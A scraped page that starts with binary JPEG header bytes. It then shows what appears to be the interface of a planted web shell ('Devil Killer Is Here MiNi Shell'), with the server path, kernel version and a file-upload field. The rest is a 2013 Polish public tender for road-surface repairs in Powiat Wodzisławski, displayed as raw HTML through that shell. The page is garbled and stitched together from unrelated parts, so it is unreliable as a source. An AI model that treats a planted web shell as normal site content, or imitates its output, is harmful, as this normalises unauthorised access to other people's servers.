JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/68740-N-2013.html

<p class="kh_header"><b>Syrynia: Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
		 Zadanie nr 1
 Zadanie nr 2
 Zadanie nr 3
 Zadanie nr 4
 Zadanie nr 5</b><br>
<b>Numer ogłoszenia: 68740 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Wodzisławiu Śl. z/s w Syryni , ul. Raciborska 3, 44-361 Syrynia, woj. śląskie, tel. 32 4517607; 32 4517415, faks 32 4517607.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
		 Zadanie nr 1
 Zadanie nr 2
 Zadanie nr 3
 Zadanie nr 4
 Zadanie nr 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie napraw nawierzchni bitumicznych dróg powiatowych, mieszankami mineralno - asfaltowymi (jak dla ruchu KR3-KR6). 
Zadanie obejmuje roboty polegające na likwidacji wybojów, ubytków i innych uszkodzeń pozimowych oraz wynikłych z bieżącej eksploatacji w nawierzchniach bitumicznych dróg powiatowych. Szczegółowy opis przedmiotu zamówienia zawiera przedmiar robót i specyfikacje techniczne, stanowiące integralną część niniejszej specyfikacji istotnych warunków zamówienia. 

4.2. OPIS CZĘŚCI ZAMÓWIENIA

Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych na terenie Powiatu Wodzisławskiego podzielono na  5 zadań (5 rejonów):

A)  ZADANIE 1 - REJON I
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 1 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego do 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do 10 sztuk studni kanalizacji deszczowej.
B) ZADANIE 2 - REJON II
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 2 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego do 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do 10 sztuk studni kanalizacji deszczowej.
C) ZADANIE 3 - REJON III
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu remontu cząstkowego nawierzchni bitumicznych mieszankami mineralno-asfaltowymi na gorąco z mechanicznym obcinaniem krawędzi piłą spalinową, z użyciem frezarki i masą na zimno, a także regulacji wysokościowej wpustów oraz studni kanalizacji deszczowej.
Zakres rzeczowy zadania nr 3 - wykonanie uzależnione będzie od potrzeb jakie wynikną  po ustaniu warunków zimowych oraz wynikłych z bieżącej eksploatacji. Szacuje się wbudowanie do 150 ton mieszanki mineralno-asfaltowej na gorąco wytworzonej w wytwórni mas bitumicznych (z tego do 100 ton w okresie do 30 maja 2013 r.), do 20 ton mieszanki mineralno - asfaltowej na zimno, do 1490 m2 remontu nawierzchni bitumicznych masą mineralno-asfaltową na gorąco z użyciem frezarki (z tego ok. 800 m2 w terminie do 30 maja 2013 r.) oraz przeprowadzenie regulacji wysokościowej do 20 sztuk wpustów kanalizacji deszczowej i do. 10 sztuk studni kanalizacji deszczowej.
D) ZADANIE 4 - REJON IV
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu naprawy uszkodzeń nawierzchni bitumicznych mieszaniną grysowo-emulsyjną wbudowaną pod ciśnieniem za pomocą remonterów drogowych. 
Przewiduje się wbudowanie łącznie do 310 ton mieszaniny grysowo-emulsyjnej na sieci dróg powiatowych rejonu IV.
E) ZADANIE 5 - REJON V
Przedmiot zamówienia obejmuje roboty polegające na wykonaniu naprawy uszkodzeń nawierzchni bitumicznych mieszaniną grysowo-emulsyjną wbudowaną pod ciśnieniem za pomocą remonterów drogowych.
Przewiduje się wbudowanie łącznie do 310 ton mieszaniny grysowo-emulsyjnej na sieci dróg powiatowych rejonu V..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające zostanie udzielone w okresie 3lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, stanowić będzie nie więcej niż 50% wartości zamówienia podstawowego i polegać będzie na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie 1 (rejon I) - 3000,00zł (słownie: trzy tysiące złotych 00/100)
Zadanie 2 (rejon II) - 3000,00zł (słownie: trzy tysiące złotych 00/100)
Zadanie 3 (rejon III) - 3000,00zł (słownie: trzy tysiące złotych 00/100)
Zadanie 4 (rejon IV) - 2000,00zł (słownie: dwa tysiące złotych 00/100)
Zadanie 5 (rejon V) - 2000,00zł (słownie: dwa tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy. 
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek, jeżeli:
a) wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min 1 zadanie  o wartości min.:
dla zadania 1 (rejonu I) - 150.000,00zł brutto, 
dla zadania 2 (rejonu II) - 150.000,00zł brutto,
dla zadania 3 (rejonu III) - 150.000,00zł brutto,
polegające na wykonaniu robót w zakresie naprawy, remontu jezdni mieszankami mineralno-bitumicznymi, podając datę i miejsce wykonania oraz załączą dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
b) wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min 1 zadanie  o wartości min.:
dla zadania 4  (rejonu IV) - 120.000,00zł brutto, 
dla zadania 5 (rejonu V) - 120.000,00zł brutto,
polegające na wykonaniu robót remontowo-konserwacyjnych związanych z wbudowaniem mieszaniny grysowo-emulsyjnej pod ciśnieniem za pomocą specjalnego remontera drogowego, podając datę i miejsce wykonania oraz załączą dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;

Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, iż Wykonawca spełnia warunek, jeżeli dysponuje: Zadanie 1 - Rejon I
Walec wibracyjny 	1 szt.
Frezarka o szerokości bębna do 100 cm	1 szt.
Piła do ciecia nawierzchni 	2, szt.
Wibrator powierzchniowy	1 szt.
Samochód skrzyniowy	1szt.
Młot hydrauliczny	1 szt.
Zadanie 2 - Rejon II
Walec wibracyjny 	1 szt.
Frezarka o szerokości bębna do 100 cm	1 szt.
Piła do ciecia nawierzchni 	2 szt.
Wibrator powierzchniowy	1 szt.
Samochód skrzyniowy	1 szt.
Młot hydrauliczny	1 szt.
Zadanie 3 - Rejon III 
Walec wibracyjny 	1 szt.
Frezarka o szerokości bębna do 100 cm	1 szt.
Piła do ciecia nawierzchni 	2 szt.
Wibrator powierzchniowy	1 szt.
Samochód skrzyniowy	1 szt.
Młot hydrauliczny	1 szt.
Zadanie 4- Rejon IV 
Remonter drogowy na samochodzie ciężarowym lub jako przyczepa współpracująca z samochodem ciężarowym	1 szt.
Zadanie 5 - Rejon V 
Remonter drogowy na samochodzie ciężarowym lub jako przyczepa współpracująca z samochodem ciężarowym	1 szt.

Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, iż Wykonawca spełnia warunek, jeżeli dysponuje osobami odpowiedzialnymi za kierowanie robotami budowlanymi tj. pracownikiem 
z uprawnieniami do wykonywania samodzielnych funkcji kierownika budowy robót drogowych.
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek, jeżeli- załączy opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie niższą niż 100.000,00zł w odniesieniu do każdej części zamówienia (rejonu) z osobna. 
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty 
Wypełniony i podpisany kosztorys ofertowy  
Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Lp.	Przyczyna/okoliczności-----------Skutek - zmiana w umowie/aneks
1.	Warunki atmosferyczne uniemożliwiające prowadzenie robót  potwierdzone  stosownym  protokołem,-------------przedłużenie terminu wykonania  umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót
2.	Wystąpienie zdarzeń losowych - klęska żywiołowa,-----------Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót
3.	Zmiana producenta materiałów /urządzeń, wycofania materiałów /urządzeń z użycia, ------------Zmiana terminu wykonania zamówienia o czas potrzebny na zakup nowych materiałów/urządzeń
4.	zmiana przepisów o podatku od towarów i usług,	------------zmiana wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT
5.	zmiana osób uczestniczących w wykonaniu zamówienia pod warunkiem, że osoby te będą spełniały wymagania określone                 w SIWZ,-------------Spisanie aneksu do umowy uwzględniającego dokonanie zmian.
6.	Rezygnacja z części robót na skutek sytuacji niemożliwej wcześniej do przewidzenia,--------Zmniejszenie wynagrodzenia wykonawcy o kwotę, którą należałoby zapłacić, gdyby przedmiotowe roboty zostały wykonane
7.	Przekształcenie wykonawcy, zmiana brzmienia firmy,-----------Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia wykonawcy lub zmiany brzmienia firmy
8.	zmiany  podwykonawcy, któremu wykonawca powierzył realizację części zamówienia ---------Spisanie aneksu do umowy uwzględniającego dokonanie zmian.
9.	Zmiana szacunkowej ilości poszczególnych pozycji kosztorysowych dla zadań:1, 2, 3 --------------Spisanie aneksu do umowy uwzględniającego dokonanie zmian, maksymalne wynagrodzenie wykonawcy za poszczególne zadanie nie ulega zmianie;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pzd.bip.powiatwodzislawski.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWY ZARZĄD  DRÓG W WODZISŁAWIU 
Z SIEDZIBĄ W SYRYNI
44-361 SYRYNIA, UL. RACIBORSKA 3
tel. (032) 451-76-07
fax.  (032) 451-76-07
e-mail: inwestycje@pzd-wodzislaw.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2013 godzina 10:00, miejsce: POWIATOWY ZARZĄD  DRÓG W WODZISŁAWIU 
Z SIEDZIBĄ W SYRYNI
44-361 SYRYNIA, UL. RACIBORSKA 3
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni bitumicznych dróg powiatowych 
na terenie Powiatu Wodzisławskiego w 2013roku:
Zadanie nr 1.</p>
